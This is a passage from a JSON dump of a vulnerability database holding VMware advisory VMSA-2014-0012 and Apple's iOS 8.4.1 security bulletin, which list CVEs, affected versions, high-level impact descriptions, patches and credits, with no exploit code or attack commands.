Team\r\n\r\n", "edition": 1, "modified": "2014-05-07T00:00:00", "published": "2014-05-07T00:00:00", "id": "SECURITYVULNS:DOC:30700", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30700", "title": "[oss-security] CVE-2014-0191 libxml2: external parameter entity loaded when entity substitution is disabled", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:56", "bulletinFamily": "software", "cvelist": ["CVE-2014-3797", "CVE-2014-0191", "CVE-2013-4238", "CVE-2013-2877", "CVE-2014-0015", "CVE-2013-1752", "CVE-2014-8371", "CVE-2014-0138"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n- ------------------------------------------------------------------------\r\n VMware Security Advisory\r\n\r\nAdvisory ID: VMSA-2014-0012\r\nSynopsis: VMware vSphere product updates address security \r\n vulnerabilities\r\nIssue date: 2014-12-04\r\nUpdated on: 2014-12-04 (Initial Advisory)\r\nCVE number: CVE-2014-3797, CVE-2014-8371, CVE-2013-2877, CVE-2014-0191, \r\n CVE-2014-0015, CVE-2014-0138, CVE-2013-1752 and \r\n CVE-2013-4238\r\n- ------------------------------------------------------------------------\r\n\r\n1. Summary\r\n\r\n VMware vSphere product updates address a Cross Site Scripting issue, \r\n a certificate validation issue and security vulnerabilities in \r\n third-party libraries.\r\n \r\n2. Relevant releases\r\n\r\n VMware vCenter Server Appliance 5.1 Prior to Update 3 \r\n\r\n VMware vCenter Server 5.5 prior to Update 2\r\n VMware vCenter Server 5.1 prior to Update 3\r\n VMware vCenter Server 5.0 prior to Update 3c\r\n\r\n VMware ESXi 5.1 without patch ESXi510-201412101-SG\r\n\r\n3. Problem Description \r\n\r\n a. VMware vCSA cross-site scripting vulnerability\r\n\r\n VMware vCenter Server Appliance (vCSA) contains a vulnerability\r\n that may allow for Cross Site Scripting. Exploitation of this \r\n vulnerability in vCenter Server requires tricking a user to click\r\n on a malicious link or to open a malicious web page while they are\r\n logged in into vCenter. \r\n\r\n VMware would like to thank Tanya Secker of Trustwave SpiderLabs for \r\n reporting this issue to us. \r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org) \r\n has assigned the name CVE-2014-3797 to this issue. \r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product\tRunning Replace with/\r\n Product Version\ton Apply Patch\r\n ============= =======\t======= =================\r\n vCSA 5.5 any Not Affected\r\n vCSA 5.1 any 5.1 Update 3\r\n vCSA 5.0 any Not Affected\r\n\r\n b. vCenter Server certificate validation issue\r\n\r\n vCenter Server does not properly validate the presented certificate \r\n when establishing a connection to a CIM Server residing on an ESXi \r\n host. This may allow for a Man-in-the-middle attack against the CIM \r\n service.\r\n\r\n VMware would like to thank The Google Security Team for reporting \r\n this issue to us.\r\n\r\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\r\n has assigned the identifier CVE-2014-8371 to this issue. \r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= =======\t======= ==============\r\n vCenter Server 5.5 any 5.5 Update 2\r\n vCenter Server 5.1 any 5.1 Update 3\r\n vCenter Server 5.0 any 5.0 Update 3c\r\n\r\n c. Update to ESXi libxml2 package\r\n\r\n libxml2 is updated to address multiple security issues. \r\n\r\n The Common Vulnerabilities and Exposures project \r\n (cve.mitre.org) has assigned the names CVE-2013-2877 and\r\n CVE-2014-0191 to these issues. \r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======= ======= =================\r\n ESXi 5.5 any Patch Pending\r\n ESXi 5.1 any ESXi510-201412101-SG\r\n ESXi 5.0 any No patch planned\r\n\r\n d. Update to ESXi Curl package\r\n\r\n Curl is updated to address multiple security issues. \r\n\r\n The Common Vulnerabilities and Exposures project \r\n (cve.mitre.org) has assigned the names CVE-2014-0015 and \r\n CVE-2014-0138 to these issues. \r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product\tRunning Replace with/\r\n Product Version\ton Apply Patch\r\n ========= =======\t======= =================\r\n ESXi 5.5 any Patch Pending\r\n ESXi 5.1 any ESXi510-201412101-SG\r\n ESXi 5.0 any No patch planned\r\n\r\n e. Update to ESXi Python package\r\n\r\n Python is updated to address multiple security issues. \r\n\r\n The Common Vulnerabilities and Exposures project \r\n (cve.mitre.org) has assigned the names CVE-2013-1752 and \r\n CVE-2013-4238 to these issues. \r\n\r\n Column 4 of the following table lists the action required to\r\n remediate the vulnerability in each release, if a solution is \r\n available.\r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======= ======= =================\r\n ESXi 5.5 any Patch Pending\r\n ESXi 5.1 any ESXi510-201412101-SG\r\n ESXi 5.0 any Patch Pending\r\n\r\n f. vCenter and Update Manager, Oracle JRE 1.6 Update 81\r\n\r\n Oracle has documented the CVE identifiers that are addressed in \r\n JRE 1.6.0 update 81 in the Oracle Java SE Critical Patch Update\r\n Advisory of July 2014. The References section provides a link to\r\n this advisory. \r\n\r\n VMware Product Running Replace with/\r\n Product Version on Apply Patch\r\n ============= ======= ======= =================\r\n vCenter Server 5.5 any not applicable *\r\n vCenter Server 5.1 any 5.1 Update 3\r\n vCenter Server 5.0 any patch pending\r\n vCenter Update Manager 5.5 any not applicable *\r\n vCenter Update Manager 5.1 any 5.1 Update 3\r\n vCenter Update Manager 5.0 any patch pending\r\n\r\n * this product uses the Oracle JRE 1.7.0 family\r\n\r\n4. Solution\r\n\r\n Please review the patch/release notes for your product and version \r\n and verify the checksum of your downloaded file. \r\n \r\n vCSA 5.1 Update 3, vCenter Server 5.1 Update 3 and Update Manager 5.1\r\n Update 3\r\n ----------------------------\r\n Downloads and Documentation: \r\n https://www.vmware.com/go/download-vsphere\r\n\r\n ESXi 5.1\r\n ----------------------------\r\n File: update-from-esxi5.1-5.1_update03.zip.zip\r\n md5sum: b3fd3549b59c6c59c04bfd09b08c6edf\r\n sha1sum: 02139101fe205894774caac02820f6ea8416fb8b\r\n http://kb.vmware.com/kb/2086288\r\n update-from-esxi5.1-5.1_update03 contains ESXi510-201412101-SG\r\n \r\n5. References\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3797\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8371\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2877\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0015\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0138\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1752\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4238\r\n\r\n JRE \r\n Oracle Java SE Critical Patch Update Advisory of July 2014\r\n\r\n http://www.oracle.com/technetwork/topics/security/cpujul2014-\r\n1972956.html\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n6. Change log\r\n\r\n 2014-12-04 VMSA-2014-0012\r\n Initial security advisory in conjunction with the release of VMware\r\n vCSA 5.1 Update 3, vCenter Server 5.1 Update 3 and ESXi 5.1 Patches \r\n released on 2014-12-04.\r\n\r\n- ------------------------------------------------------------------------\r\n\r\n7. Contact\r\n\r\n E-mail list for product security notifications and announcements:\r\n http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\r\n\r\n This Security Advisory is posted to the following lists:\r\n\r\n security-announce at lists.vmware.com\r\n bugtraq at securityfocus.com\r\n fulldisclosure at seclists.org\r\n\r\n E-mail: security at vmware.com\r\n PGP key at: http://kb.vmware.com/kb/1055\r\n\r\n VMware Security Advisories\r\n http://www.vmware.com/security/advisories\r\n\r\n Consolidated list of VMware Security Advisories\r\n http://kb.vmware.com/kb/2078735\r\n\r\n VMware Security Response Policy\r\n https://www.vmware.com/support/policies/security_response.html\r\n\r\n VMware Lifecycle Support Phases\r\n https://www.vmware.com/support/policies/lifecycle.html\r\n \r\n Twitter\r\n https://twitter.com/VMwareSRC\r\n\r\n Copyright 2014 VMware Inc. All rights reserved.\r\n\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: Encryption Desktop 10.3.0 (Build 8741)\r\nCharset: utf-8\r\n\r\nwj8DBQFUgLnkDEcm8Vbi9kMRArHeAKDSKrUyaCHxpcXMS8KRHlaB80B90wCdGoV1\r\nea+5vLRA631Cn0q1Mt63s4s=\r\n=OYK3\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-12-11T00:00:00", "published": "2014-12-11T00:00:00", "id": "SECURITYVULNS:DOC:31491", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31491", "title": "NEW: VMSA-2014-0012 - VMware vSphere product updates address security vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:01", "bulletinFamily": "software", "cvelist": ["CVE-2015-3758", "CVE-2015-3733", "CVE-2015-3776", "CVE-2015-3736", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-5752", "CVE-2015-3744", "CVE-2015-3734", "CVE-2015-3731", "CVE-2015-3778", "CVE-2015-3752", "CVE-2015-3732", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3798", "CVE-2015-3738", "CVE-2015-5777", "CVE-2015-5759", "CVE-2015-3740", "CVE-2015-3782", "CVE-2015-3739", "CVE-2015-3784", "CVE-2015-3743", "CVE-2015-3768", "CVE-2015-3747", "CVE-2015-5781", "CVE-2015-5749", "CVE-2015-3805", "CVE-2015-5774", "CVE-2015-3730", "CVE-2015-3803", "CVE-2015-3750", "CVE-2015-3795", "CVE-2015-3755", "CVE-2015-5766", "CVE-2015-5746", "CVE-2015-5761", "CVE-2015-3753", "CVE-2015-5773", "CVE-2015-3800", "CVE-2015-3807", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-3749", "CVE-2015-3742", "CVE-2012-6685", "CVE-2015-3748", "CVE-2015-5775", "CVE-2015-3759", "CVE-2015-3746", "CVE-2015-5770", "CVE-2015-3793", "CVE-2015-5755", "CVE-2015-3756", "CVE-2015-5758", "CVE-2015-3763", "CVE-2015-3804", "CVE-2015-3741", "CVE-2015-3751", "CVE-2015-5782", "CVE-2015-5778", "CVE-2015-3745", "CVE-2015-3735", "CVE-2015-5757", "CVE-2015-3796", "CVE-2015-3806", "CVE-2015-3737", "CVE-2015-5769", "CVE-2015-3729"], "description": "Over 70 of different vulnerabilities.", "edition": 1, "modified": "2015-08-17T00:00:00", "published": "2015-08-17T00:00:00", "id": "SECURITYVULNS:VULN:14631", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14631", "title": "Apple iOS multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-3758", "CVE-2015-3733", "CVE-2015-3776", "CVE-2015-3736", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-5752", "CVE-2015-3744", "CVE-2015-3734", "CVE-2015-3731", "CVE-2015-3778", "CVE-2015-3752", "CVE-2015-3732", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3798", "CVE-2015-3738", "CVE-2015-5777", "CVE-2015-5759", "CVE-2015-3740", "CVE-2015-3782", "CVE-2015-3739", "CVE-2015-3784", "CVE-2015-3743", "CVE-2015-3768", "CVE-2015-3747", "CVE-2015-5781", "CVE-2015-5749", "CVE-2015-3805", "CVE-2015-5774", "CVE-2015-3730", "CVE-2015-3803", "CVE-2015-3750", "CVE-2015-3795", "CVE-2015-3755", "CVE-2015-5766", "CVE-2015-5746", "CVE-2015-5761", "CVE-2015-3753", "CVE-2015-5773", "CVE-2015-3800", "CVE-2015-3807", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-3749", "CVE-2015-3742", "CVE-2012-6685", "CVE-2015-3748", "CVE-2015-5775", "CVE-2015-3759", "CVE-2015-3746", "CVE-2015-5770", "CVE-2015-3793", "CVE-2015-5755", "CVE-2015-3756", "CVE-2015-5758", "CVE-2015-3763", "CVE-2015-3804", "CVE-2015-3741", "CVE-2015-3751", "CVE-2015-5782", "CVE-2015-5778", "CVE-2015-3745", "CVE-2015-3735", "CVE-2015-5757", "CVE-2015-3796", "CVE-2015-3806", "CVE-2015-3737", "CVE-2015-5769", "CVE-2015-3729"], "description": "\r\n\r\nAPPLE-SA-2015-08-13-3 iOS 8.4.1\r\n\r\niOS 8.4.1 is now available and addresses the following:\r\n\r\nAppleFileConduit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A maliciously crafted afc command may allow access to\r\nprotected parts of the filesystem\r\nDescription: An issue existed in the symbolic linking mechanism of\r\nafc. This issue was addressed by adding additional path checks.\r\nCVE-ID\r\nCVE-2015-5746 : evad3rs, TaiG Jailbreak Team\r\n\r\nAir Traffic\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: AirTraffic may have allowed access to protected parts of the\r\nfilesystem\r\nDescription: A path traversal issue existed in asset handling. This\r\nwas addressed with improved validation.\r\nCVE-ID\r\nCVE-2015-5766 : TaiG Jailbreak Team\r\n\r\nBackup\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to create symlinks to\r\nprotected regions of the disk\r\nDescription: An issue existed within the path validation logic for\r\nsymlinks. This issue was addressed through improved path\r\nsanitization.\r\nCVE-ID\r\nCVE-2015-5752 : TaiG Jailbreak Team\r\n\r\nbootp\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious Wi-Fi network may be able to determine networks\r\na device has previously accessed\r\nDescription: Upon connecting to a Wi-Fi network, iOS may have\r\nbroadcast MAC addresses of previously accessed networks via the DNAv4\r\nprotocol. This issue was addressed through disabling DNAv4 on\r\nunencrypted Wi-Fi networks.\r\nCVE-ID\r\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute,\r\nUniversity of Oxford (on the EPSRC Being There project)\r\n\r\nCertificate UI\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: An attacker with a privileged network position may be able\r\nto accept untrusted certificates from the lock screen\r\nDescription: Under certain circumstances, the device may have\r\npresented a certificate trust dialog while in a locked state. This\r\nissue was addressed through improved state management.\r\nCVE-ID\r\nCVE-2015-3756 : Andy Grant of NCC Group\r\n\r\nCloudKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to access the iCloud\r\nuser record of a previously signed in user\r\nDescription: A state inconsistency existed in CloudKit when signing\r\nout users. This issue was addressed through improved state handling.\r\nCVE-ID\r\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\r\n\r\nCFPreferences\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious app may be able to read other apps' managed\r\npreferences\r\nDescription: An issue existed in the third-party app sandbox. This\r\nissue was addressed by improving the third-party sandbox profile.\r\nCVE-ID\r\nCVE-2015-3793 : Andreas Weinlein of the Appthority Mobility Threat\r\nTeam\r\n\r\nCode Signing\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to execute unsigned code\r\nDescription: An issue existed that allowed unsigned code to be\r\nappended to signed code in a specially crafted executable file. This\r\nissue was addressed through improved code signature validation.\r\nCVE-ID\r\nCVE-2015-3806 : TaiG Jailbreak Team\r\n\r\nCode Signing\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A specially crafted executable file could allow unsigned,\r\nmalicious code to execute\r\nDescription: An issue existed in the way multi-architecture\r\nexecutable files were evaluated that could have allowed unsigned code\r\nto be executed. This issue was addressed through improved validation\r\nof executable files.\r\nCVE-ID\r\nCVE-2015-3803 : TaiG Jailbreak Team\r\n\r\nCode Signing\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A local user may be able to execute unsigned code\r\nDescription: A validation issue existed in the handling of Mach-O\r\nfiles. This was addressed by adding additional checks.\r\nCVE-ID\r\nCVE-2015-3802 : TaiG Jailbreak Team\r\nCVE-2015-3805 : TaiG Jailbreak Team\r\n\r\nCoreMedia Playback\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Viewing a maliciously crafted movie file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in CoreMedia\r\nPlayback. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5777 : Apple\r\nCVE-2015-5778 : Apple\r\n\r\nCoreText\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\r\n\r\nDiskImages\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Processing a maliciously crafted DMG file may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption issue existed in parsing of\r\nmalformed DMG images. This issue was addressed through improved\r\nmemory handling.\r\nCVE-ID\r\nCVE-2015-3800 : Frank Graziano of the Yahoo Pentest Team\r\n\r\nFontParser\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Processing a maliciously crafted font file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\nfont files. This issue was addressed through improved input\r\nvalidation.\r\nCVE-ID\r\nCVE-2015-3804 : Apple\r\nCVE-2015-5756 : John Villamil (@day6reak), Yahoo Pentest Team\r\nCVE-2015-5775 : Apple\r\n\r\nImageIO\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Processing a maliciously crafted .tiff file may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the processing of\r\n.tiff files. This issue was addressed through improved bounds\r\nchecking.\r\nCVE-ID\r\nCVE-2015-5758 : Apple\r\n\r\nImageIO\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of PNG images. Visiting a malicious website may\r\nresult in sending data from process memory to the website. This issue\r\nwas addressed through improved memory initialization and additional\r\nvalidation of PNG images.\r\nCVE-ID\r\nCVE-2015-5781 : Michal Zalewski\r\n\r\nImageIO\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Visiting a maliciously crafted website may result in the\r\ndisclosure of process memory\r\nDescription: An uninitialized memory access issue existed in\r\nImageIO's handling of TIFF images. Visiting a malicious website may\r\nresult in sending data from process memory to the website. This issue\r\nis addressed through improved memory initialization and additional\r\nvalidation of TIFF images.\r\nCVE-ID\r\nCVE-2015-5782 : Michal Zalewski\r\n\r\nIOKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Parsing a maliciously crafted plist may lead to an\r\nunexpected application termination or arbitrary code execution with\r\nsystem privileges\r\nDescription: A memory corruption existed in processing of malformed\r\nplists. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3776 : Teddy Reed of Facebook Security, Patrick Stein\r\n(@jollyjinx) of Jinx Germany\r\n\r\nIOHIDFamily\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A local user may be able to execute arbitrary code with\r\nsystem privileges\r\nDescription: A buffer overflow issue existed in IOHIDFamily. This\r\nissue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5774 : TaiG Jailbreak Team\r\n\r\nKernel\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to determine kernel\r\nmemory layout\r\nDescription: An issue existed in the mach_port_space_info interface,\r\nwhich could have led to the disclosure of kernel memory layout. This\r\nwas addressed by disabling the mach_port_space_info interface.\r\nCVE-ID\r\nCVE-2015-3766 : Cererdlong of Alibaba Mobile Security Team,\r\n@PanguTeam\r\n\r\nKernel\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: An integer overflow existed in the handling of IOKit\r\nfunctions. This issue was addressed through improved validation of\r\nIOKit API arguments.\r\nCVE-ID\r\nCVE-2015-3768 : Ilja van Sprundel\r\n\r\nLibc\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Processing a maliciously crafted regular expression may lead\r\nto an unexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in the TRE library.\r\nThis issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3796 : Ian Beer of Google Project Zero\r\nCVE-2015-3797 : Ian Beer of Google Project Zero\r\nCVE-2015-3798 : Ian Beer of Google Project Zero\r\n\r\nLibinfo\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A remote attacker may be able to cause unexpected\r\napplication termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in handling AF_INET6\r\nsockets. This issue was addressed by improved memory handling.\r\nCVE-ID\r\nCVE-2015-5776 : Apple\r\n\r\nlibpthread\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling syscalls.\r\nThis issue was addressed through improved lock state checking.\r\nCVE-ID\r\nCVE-2015-5757 : Lufeng Li of Qihoo 360\r\n\r\nlibxml2\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Parsing a maliciously crafted XML document may lead to\r\ndisclosure of user information\r\nDescription: A memory corruption issue existed in parsing of XML\r\nfiles. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3807 : Michal Zalewski\r\n\r\nlibxml2\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Multiple vulnerabilities existed in libxml2 versions prior\r\nto 2.9.2, the most serious of which may allow a remote attacker to\r\ncause a denial of service\r\nDescription: Multiple vulnerabilities existed in libxml2 versions\r\nprior to 2.9.2. These were addressed by updating libxml2 to version\r\n2.9.2.\r\nCVE-ID\r\nCVE-2012-6685 : Felix Groebert of Google\r\nCVE-2014-0191 : Felix Groebert of Google\r\nCVE-2014-3660 : Felix Groebert of Google\r\n\r\nlibxpc\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to execute arbitrary\r\ncode with system privileges\r\nDescription: A memory corruption issue existed in handling of\r\nmalformed XPC messages. This issue was improved through improved\r\nbounds checking.\r\nCVE-ID\r\nCVE-2015-3795 : Mathew Rowley\r\n\r\nLocation Framework\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A local user may be able to modify protected parts of the\r\nfilesystem\r\nDescription: A symbolic link issue was addressed through improved\r\npath validation.\r\nCVE-ID\r\nCVE-2015-3759 : Cererdlong of Alibaba Mobile Security Team\r\n\r\nMobileInstallation\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious enterprise application may be able to replace\r\nextensions for other apps\r\nDescription: An issue existed in the install logic for universal\r\nprovisioning profile apps, which allowed a collision to occur with\r\nexisting bundle IDs. This issue was addressed through improved bundle\r\nID validation.\r\nCVE-ID\r\nCVE-2015-5770 : FireEye\r\n\r\nMSVDX Driver\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Viewing a malicious video may lead to a unexpected system\r\ntermination\r\nDescription: A denial of service issue was addressed through\r\nimproved memory handling.\r\nCVE-ID\r\nCVE-2015-5769 : Proteas of Qihoo 360 Nirvan Team\r\n\r\nOffice Viewer\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Parsing a maliciously crafted XML file may lead to\r\ndisclosure of user information\r\nDescription: An external entity reference issue existed in XML file\r\nparsing. This issue was addressed through improved parsing.\r\nCVE-ID\r\nCVE-2015-3784 : Bruno Morisson of INTEGRITY S.A.\r\n\r\nQL Office\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Parsing a maliciously crafted office document may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: A memory corruption issue existed in parsing of office\r\ndocuments. This issue was addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-5773 : Apple\r\n\r\nSafari\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Visiting a malicious website may lead to user interface\r\nspoofing\r\nDescription: A malicious website could open another site and prompt\r\nfor user input without a way for the user to tell where the prompt\r\noriginated. The issue was addressed by displaying the prompt's origin\r\nto the user.\r\nCVE-ID\r\nCVE-2015-3729 : Code Audit Labs of VulnHunt.com\r\n\r\nSafari\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious website may trigger an infinite number of alert\r\nmessages\r\nDescription: An issue existed where a malicious or hacked website\r\ncould show infinite alert messages and make users believe their\r\nbrowser was locked. The issue was addressed through throttling of\r\nJavaScript alerts.\r\nCVE-ID\r\nCVE-2015-3763\r\n\r\nSandbox_profiles\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: An malicious app may be able to read other apps' managed\r\npreferences\r\nDescription: An issue existed in the third-party app sandbox. This\r\nissue was addressed by improving the third-party sandbox profile.\r\nCVE-ID\r\nCVE-2015-5749 : Andreas Weinlein of the Appthority Mobility Threat\r\nTeam\r\n\r\nUIKit WebView\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious application may be able to initiate FaceTime\r\ncalls without user authorization\r\nDescription: An issue existed in the parsing of FaceTime URLs within\r\nWebViews. This issue was addressed through improved URL validation.\r\nCVE-ID\r\nCVE-2015-3758 : Brian Simmons of Salesforce, Guillaume Ross\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Visiting a maliciously crafted website may lead to an\r\nunexpected application termination or arbitrary code execution\r\nDescription: Multiple memory corruption issues existed in WebKit.\r\nThese issues were addressed through improved memory handling.\r\nCVE-ID\r\nCVE-2015-3730 : Apple\r\nCVE-2015-3731 : Apple\r\nCVE-2015-3732 : Apple\r\nCVE-2015-3733 : Apple\r\nCVE-2015-3734 : Apple\r\nCVE-2015-3735 : Apple\r\nCVE-2015-3736 : Apple\r\nCVE-2015-3737 : Apple\r\nCVE-2015-3738 : Apple\r\nCVE-2015-3739 : Apple\r\nCVE-2015-3740 : Apple\r\nCVE-2015-3741 : Apple\r\nCVE-2015-3742 : Apple\r\nCVE-2015-3743 : Apple\r\nCVE-2015-3744 : Apple\r\nCVE-2015-3745 : Apple\r\nCVE-2015-3746 : Apple\r\nCVE-2015-3747 : Apple\r\nCVE-2015-3748 : Apple\r\nCVE-2015-3749 : Apple\r\n\r\nWeb\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: Visiting a malicious website may lead to user interface\r\nspoofing\r\nDescription: Navigating to a malformed URL may have allowed a\r\nmalicious website to display an arbitrary URL. This issue was\r\naddressed through improved URL handling.\r\nCVE-ID\r\nCVE-2015-3755 : xisigr of Tencent's Xuanwu Lab\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious website may exfiltrate image data cross-origin\r\nDescription: Images fetched through URLs that redirected to a\r\ndata:image resource could have been exfiltrated cross-origin. This\r\nissue was addressed through improved canvas taint tracking.\r\nCVE-ID\r\nCVE-2015-3753 : Antonio Sanso and Damien Antipa of Adobe\r\n\r\nWebKit\r\nAvailable for: iPhone 4s and later,\r\niPod touch (5th generation) and later, iPad 2 and later\r\nImpact: A malicious website can trigger plaintext requests to an\r\norigin under HTTP Strict Transport Security\r\nDescription: An issue existed where Content Security Policy report\r\nrequests would not honor HTTP Strict Transport Security (HSTS). The\r\nissue was addressed by applying HSTS 